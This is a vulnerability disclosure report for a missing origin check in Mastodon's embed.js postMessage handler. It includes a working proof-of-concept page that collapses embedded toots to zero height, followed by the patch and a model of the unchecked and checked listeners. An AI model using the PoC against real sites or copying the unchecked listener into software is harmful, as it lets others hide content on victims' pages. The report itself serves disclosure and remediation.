Improper Restriction of Names for Files and Other Resources in mastodon/mastodon
Reported on
Jan 20th 2022
Description
The message event listener in embed.js does not check the origin of a postMessage before changing the height of the embedded toots. The vulnerable code lets any origin postMessage to the browser window and feeds the attacker's id and height values straight into the handler, so the attacker can change the height of toots and even make them disappear from the website by setting the height to 0.
Proof of Concept
STEP 1: The victim posts toots on Mastodon and embeds them on their website using the following code:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Victim's website</title>
</head>
<body>
<br>
<iframe src="https://mas.to/@reo1212/107650549212219629/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<script src="https://mas.to/embed.js" async="async"></script>
<br>
<iframe src="https://mas.to/@reo1212/107651044255197372/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<br>
<iframe src="https://mas.to/@reo1212/107651044524139207/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<br>
<iframe src="https://mas.to/@reo1212/107651044731807705/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<br>
</body>
</html>
STEP 2: The attacker hosts the following code on their website.
NOTE: Set the values marked SET THIS VALUE to match the target website before use.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
<body>
<p>
This exploit changes the height of all iframe tags with class "mastodon-embed" to "0", which makes the embedded toots disappear from the victim's website for as long as the browser window stays open.
</p>
<script>
function exploit(){
var target = 'http://localhost:8081/mastodon-iframes.html'; // SET THIS VALUE
var NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE = 4; // SET THIS VALUE
window.poc = window.open(target);
const interval = setInterval(run, 2000);
function run(){
for(let id=0; id<NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE; id++){
var payload = JSON.parse(`{"type": "setHeight", "id": ${id}, "height": "0"}`);
console.log(payload);
window.poc.postMessage(payload,'*');
}
}
}
</script>
<input type="button" onclick="exploit()" value="EXPLOIT">
</body>
</html>
STEP 3: Now exploit the vulnerability by clicking the EXPLOIT button on the attacker's website. You will notice that the attacker's code continuously sets the height of the toots to 0, making them disappear from the victim's website.
Please check the video PoC: https://drive.google.com/file/d/1ZcihyzMuguCpxhwdMiwTSWifydNgBdrg/view
Impact
This exploit changes the height of all iframe tags with class mastodon-embed to 0, which makes the embedded toots disappear from the victim's website for as long as the browser window remains open. No toots will be visible even when the user refreshes the browser window.
Occurrences
embed.js L15-L23
Check the origin the message is coming from. Only allow trusted origins.
I have submitted the patch. It checks whether the origin of the incoming message is the same as the origin of the website, i.e. if window.location.origin !== e.origin, then we return and do not go forward. The fix_check_origin_and_prototype branch also contains the fix for the other vulnerability submitted by me.
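As an added illustration (not Mastodon's embed.js and not the reporter's patch), the listener is modelled below in its unchecked form beside one that applies the origin check the Remediation section asks for. The trusted origin is assumed to be the embed server's origin (https://mas.to in the PoC), and the iframes are constructed objects so the code runs in Node without a DOM.

```javascript
// Added example, not Mastodon's embed.js: a minimal model of the
// "message" listener in its unchecked form and with an origin check.
// Iframes are plain objects so the code runs in Node.

// Constructed stand-in for the .mastodon-embed iframes on the host page.
function makeIframes(count) {
  const frames = [];
  for (let i = 0; i < count; i++) {
    frames.push({ id: i, className: 'mastodon-embed', height: '150' });
  }
  return frames;
}

// Unchecked listener: any window that can postMessage to the host page
// gets to set the height of any embed it names, including "0".
function handleMessageUnchecked(event, iframes) {
  const data = event.data;
  if (!data || typeof data !== 'object' || data.type !== 'setHeight') {
    return false;
  }
  if (!Number.isInteger(data.id) || !iframes[data.id]) {
    return false;
  }
  iframes[data.id].height = String(data.height);
  return true;
}

// Hardened listener: a message is acted on only if it comes from the
// origin the embeds were loaded from (assumed here to be the iframe src
// origin, https://mas.to in the PoC). The trusted origin is passed in
// explicitly so the function runs outside a browser.
function handleMessageChecked(event, iframes, trustedOrigin) {
  if (typeof event.origin !== 'string' || event.origin !== trustedOrigin) {
    return false; // foreign origin: ignore, never touch the iframe
  }
  return handleMessageUnchecked(event, iframes);
}

// Replays the PoC payload from a foreign origin against both listeners and
// reports which one let the embed collapse to height "0".
function replayPoc(trustedOrigin) {
  const attack = { origin: 'https://attacker.example', // constructed origin
                   data: { type: 'setHeight', id: 0, height: '0' } };
  const unchecked = makeIframes(1);
  const checked = makeIframes(1);
  handleMessageUnchecked(attack, unchecked);
  handleMessageChecked(attack, checked, trustedOrigin);
  return { uncheckedHeight: unchecked[0].height, checkedHeight: checked[0].height };
}
```

Calling `replayPoc('https://mas.to')` returns `{ uncheckedHeight: '0', checkedHeight: '150' }`: the unchecked listener collapses the embed, the checked one leaves it untouched.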